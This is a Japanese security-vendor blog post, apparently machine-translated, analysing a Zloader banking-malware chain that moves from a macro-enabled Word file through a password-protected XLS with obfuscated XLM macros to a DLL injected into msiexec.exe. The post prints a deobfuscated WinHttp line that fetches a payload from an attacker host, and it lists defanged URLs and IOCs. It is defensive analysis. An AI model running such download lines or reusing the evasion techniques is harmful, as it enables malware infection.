• 製品とサービス
        • クラウド

          • エンドポイント保護
          • エンドポイントの検出と応答
          • モバイルデバイス管理
          • BYOD
          • 拡張された検出と応答
          • ゼロトラストネットワークアクセス
          • Data Privacy
        • オンプレミス

          • エンドポイント保護
          • エンドポイントの検出と応答
          • Data Privacy
        • Platform

          • マルウェア分析プラットフォーム
        • ディーラー&卸売

          • SOHOトータルエディション
        • サービス

          • 脅威情報
          • デジタルリスク保護サービス(DRPS)
          • ランサムウェア復旧サービス (RRaaS)
          • DPDPコンプライアンス
          • 管理された検出と応答
  • ソリューション
    • 金融・保険
    • 学位
    • 政府・公共機関
    • 健康
    • ITeS
    • 製造現場
  • 貴社名
    • Seqriteについて
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • パートナー
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • リソース
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • データプライバシーを理解する
    • DPDP対話
情報技術、ネットワーク、サイバーセキュリティに関するブログ | Seqrite Blog
営業担当者へ連絡
  • 製品とサービス
        • クラウド

          • エンドポイント保護
          • エンドポイントの検出と応答
          • モバイルデバイス管理
          • BYOD
          • 拡張された検出と応答
          • ゼロトラストネットワークアクセス
          • Data Privacy
        • オンプレミス

          • エンドポイント保護
          • エンドポイントの検出と応答
          • Data Privacy
        • Platform

          • マルウェア分析プラットフォーム
        • ディーラー&卸売

          • SOHOトータルエディション
        • サービス

          • 脅威情報
          • デジタルリスク保護サービス(DRPS)
          • ランサムウェア復旧サービス (RRaaS)
          • DPDPコンプライアンス
          • 管理された検出と応答
  • ソリューション
    • 金融・保険
    • 学位
    • 政府・公共機関
    • 健康
    • ITeS
    • 製造現場
  • 貴社名
    • Seqriteについて
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • パートナー
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • リソース
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • データプライバシーを理解する
    • DPDP対話
ホーム  /  フィッシング詐欺  / Zloader: さまざまなOfficeファイルを含む
Zloader: さまざまなOfficeファイルを含む
23 3月 2021

Zloader: さまざまなOfficeファイルを含む

著者 アンジャリ・ラウト
アンジャリ・ラウト
フィッシング詐欺

Zloader(別名Terdot)は、悪名高いバンキングマルウェアZeusの亜種であり、ペイロードを配信するための初期ベクトルとして「.xls」および「.xlsx」ファイルを積極的に利用することで知られています。しかしながら、最近、Zloaderファミリーが初期活動に使用している「.docm」ファイルを発見しました。これは、攻撃者がセキュリティソリューションによる検出を回避するために、Office文書を悪用する傾向があることを示しています。

                                                       図1-攻撃チェーン

初期ベクトル:

ここで感染連鎖が始まります 「.docm」 ファイルです。docmは「マクロ対応Office Word文書」の略です。以下は、ユーザーにコンテンツを有効にするよう求めるドキュメントビューです。

                                                            図2-ドキュメントビュー

他の多くのドキュメントと同様に、コンテンツを有効にした後、そのアクティビティを観察しようとしましたが、何も変化がありませんでした。VBAコードを確認することで、答えが見つかりました。コンテンツを有効にしてもマクロは実行されません。ここでは、マクロの実行は「ドキュメントを閉じる」時に開始されます。

                                                               図3-マクロ関数呼び出し

被害者がこの文書を閉じるとすぐに、 「んん」 このVBAマクロのメイン関数が呼び出されます。ここでもサブ関数が呼び出されます。ここでも攻撃者は以下のものを利用しています。 「ユーザーフォーム」 次のステージのアクティビティを実行します。

                                                        図4 - サブ関数呼び出し

UserForm_Initialize() 関数は「Userform2」を呼び出すために使用されます。下の画像は Userform2 オブジェクトを示しています。ダイアログボックスでは、URL データがチャンク化され、25 番目のコンボボックスに重ねて表示され、実際のデータが隠されています。

                                                 図5- 隠しURLデータ

userform2 のすべての ComboBox を調べた結果、第 2 段階のペイロードをダウンロードするために使用される悪意のある URL を見つけることができました。

                                                          図6- チャンク化されたURLデータ

上記の活動をまとめると、攻撃者はforループを利用してこれらすべての値にアクセスし、以下に示すように最終的なURLを作成しています。

                                                   図7 - ドキュメントを閉じる際のURLの作成

ウイルススコア1の悪意あるサイト「hxxps[:]//feelingfit-always[.]com/11[.]php」は、パスワード保護されたXLSファイルをダウンロードするために使用されます。このファイルのパスワードは、「Userform1」内のVBAマクロに隠されています。userform1のデータを調査することで、隠されたパスワードを抽出することができました。

                                      図8 - XLSをパスワードで保護するマクロコード
                                                          図9- XLS隠しパスワード

 

2nd ステージペイロード:

文書をパスワードで保護することは、アンチウイルスベンダーから身を守るための典型的な手法です。さらに深く分析するには、正しいパスワードが必要です。上記のパスワードを照合することで、ようやくExcelブックの内容を確認できます。「Sheet3」では、XLMマクロを使用してさらなるアクティビティを実行します。

                                                   図10- XLSワークブック

ここでは、コードはドキュメント内の異なるセルに埋め込まれています。下の図は、上記のワークブックから抽出したマクロコードを示しています。

                                                    図11- XLMマクロコード

ここで攻撃者は、Excelに組み込まれているIIFやSwitchといった関数を利用してデータを難読化します。最終的に難読化されたコードは以下の通りです。

      WinHttp.WinHttpRequest.5.1.open GET https[:]//santarosafuneralhome[.]com/2.php False

      WinHttp.WinHttpRequest.5.1.SetRequestHeader

      WinHttp.WinHttpRequest.5.1.送信

ウイルス合計スコア 8 を持つ上記の悪意のある URL は、この攻撃の第 3 段階のペイロードをダウンロードするために使用されます。

最終ペイロード分析:

DLLはZloaderの最終的なペイロードです。DLLは高度に難読化されており、Windows APIへの直接呼び出しを回避しています。ハッシュ化によってアドレスが計算され、計算された値を使用して呼び出しが行われるため、逆コンパイルは困難です。

                                                         図12 - アドレス計算コード

DLL は、Windows コンポーネント インストーラーに属する正規の Microsoft プロセスであるプロセス「msiexec.exe」を一時停止モードで作成し、暗号化されたファイルをそこに挿入します。

                                                               図13 - サスペンドモードで作成された「msiexec.exe」
                                                                  図14 - 'msiexec.exe'に挿入された暗号化ファイル

また、悪意のある PE を復号化して実行するためのルーチンも挿入します。

                                                                                         図15- 復号ルーチン

スレッド コンテキストを設定すると、初期実行ポイントが渡され、最後に挿入されたコードが再開スレッドで実行されます。

このmsiexec.exeのスレッドが実行されると、次のようにCnCサーバーへの接続を試みます。

分析時にこれらの URL がダウンしていたため、さらに詳しく調べることはできませんでした。

まとめ:

このタイプの攻撃は、攻撃者が感染チェーンを開始して被害者を侵害するためのメカニズムをどのように革新するかを示しています。ユーザーは、Officeファイルを開く際に常に注意する必要があります。クイックヒールと Seqriteエンタープライズセキュリティソリューション 顧客をこのようなファイルから保護してください。エンドポイントセキュリティソリューションは常に最新の状態に保ってください。

IOC:

文書:

117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d

409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1

91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4

XLS:   52d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89

URL:

https[://]tiodeitidampheater.tk/post.php

https[://]actes-etatcivil.com/post.php

https[://]ankarakreatif.com/post.php

https[://]www.ramazanyildiz.net/post.php

https[://]hispaniaeng.com/post.php

https[://]www.ifdd.francophonie.org/post.php

 

主題専門家

アンジャリ・ラウト

プリヤンカ・シンデ

 

 

 以前の投稿ビジネスシステムが違法な目的で使用されるのを防ぎます
次の投稿  暗号通貨マルウェア: 知っておくべきビットコインマイニングの脅威...
アンジャリ・ラウト

アンジャリ・ラウトについて

Anjali は、Quick Heal Technologies Ltd. の準セキュリティ研究者です。彼女の関心は、リバースエンジニアリング、マルウェア分析、進行中のマルウェアの探索などです...

アンジャリ・ラウトによる記事 »

関連記事

  • HTA に別れを告げ、MSI にようこそ: マルチプラットフォーム攻撃による APT の新たな TTP とクラスター

    2025 年 4 月 8 日
  • SVCの新スティーラーが登場

    2025 年 3 月 21 日
  • QRコードフィッシング(Quishing)攻撃:その見分け方と防止方法

    2025 年 3 月 18 日
注目の著者
  • セクライト
    セクライト

    Seqriteは、エンタープライズ向けサイバーセキュリティソリューションのリーディングプロバイダーです。…

    続きを読む..
  • ジョティ・カルレカー
    ジョティ・カルレカー

    私は、新興テクノロジーに関するコンテンツの作成を楽しむ熱心なライターです。

    続きを読む..
  • ビニーシュ・P
    ビニーシュ・P

    私はサイバーセキュリティに情熱を注ぎ、熱心なライターでもあります。得意分野は…

    続きを読む..
  • サンジェイ・カトカル
    サンジェイ・カトカル

    Sanjay Katkar 氏は、Quick Heal Technologies の共同マネージング ディレクターです。

    続きを読む..
トピック
apt (25) サイバー攻撃 (36) サイバー攻撃 (58) サイバー攻撃 (16) サイバー攻撃 (15) Cybersecurity (335) サイバーセキュリティ (34) サイバー脅威 (33) サイバー脅威 (50) データ侵害 (56) データ侵害 (29) データ損失 (28) データ損失防止 (34) データプライバシー (15) データ保護 (32) データセキュリティ (17) DLP (50) DPDP (14) DPDPA (16) Encryption (16) エンドポイントセキュリティ (110) エンタープライズセキュリティ (18) 悪用する (13) GDPR (13) マルウェア (76) マルウェア分析 (13) マルウェア攻撃 (23) マルウェア攻撃 (12) MDM (27) Microsoft (15) ネットワークセキュリティ (24) パッチ管理 (12) フィッシング詐欺 (29) ランサムウェア (69) ransomware攻撃 (30) ransomware攻撃 (30) ransomwareの保護 (14) セクライト (41) Seqrite暗号化 (27) セクライト EPS (33) Seqriteサービス (16) 脅威情報 (13) UTM (34) 脆弱性 (16) ゼロトラスト (13)
情報技術、ネットワーク、サイバーセキュリティに関するブログ | Seqrite

世界中でクラス最高の脅威防止、検出、対応ソリューションによりエンドポイント、データ、ネットワークのセキュリティを簡素化する、大手エンタープライズ IT セキュリティ ソリューション プロバイダーです。

つづきを読む

私たちに従ってください:

ニュースレターに登録

最新のサイバーセキュリティのトレンドと洞察に関する情報を入手してください。

ローディング
製品とサービス
  • クラウド
  • エンドポイント保護
  • エンドポイントの検出と応答
  • モバイルデバイス管理
  • BYOD
  • 拡張された検出と応答
  • ゼロトラストネットワークアクセス
  • Data Privacy
  • オンプレミス
  • エンドポイント保護
  • エンドポイントの検出と応答
  • Data Privacy
  • Platform
  • マルウェア分析プラットフォーム
  • マイクロビジネス
  • SOHOトータルエディション
  • サービス
  • 脅威情報
  • デジタルリスク保護サービス(DRPS)
  • ランサムウェア復旧サービス (RRaaS)
  • DPDPコンプライアンス
  • 管理された検出と応答
リソース
  • ブログ
  • ホワイトペーパー
  • データシート
  • 脅威レポート
  • マニュアル
  • PoV
  • データプライバシーを理解する
  • DPDP対話
  • ポリシーとコンプライアンス
  • EULA
  • ゴーディープ
  • SIA
お問い合わせ
  • 登記事務所
  • 最寄りのオフィス
  • サイバーセキュリティについて話しましょう
サポート
  • テクニカルサポート
  • ソフトウェア・ダウンロード
  • オフラインアップデータ
  • ファームウェア・アップグレード
  • アップグレード
  • 製品ドキュメント
私たちに関しては
  • Seqriteについて
  • リーダーシップ
  • 受賞
  • ニュースルーム
Partner
  • パートナープログラム
  • パートナーを探す
  • パートナーになる
  • Seqrite認定

© 2026 クイックヒールテクノロジーズ株式会社

サイトマップ プライバシーポリシー 法的通知 クッキーポリシー 利用規約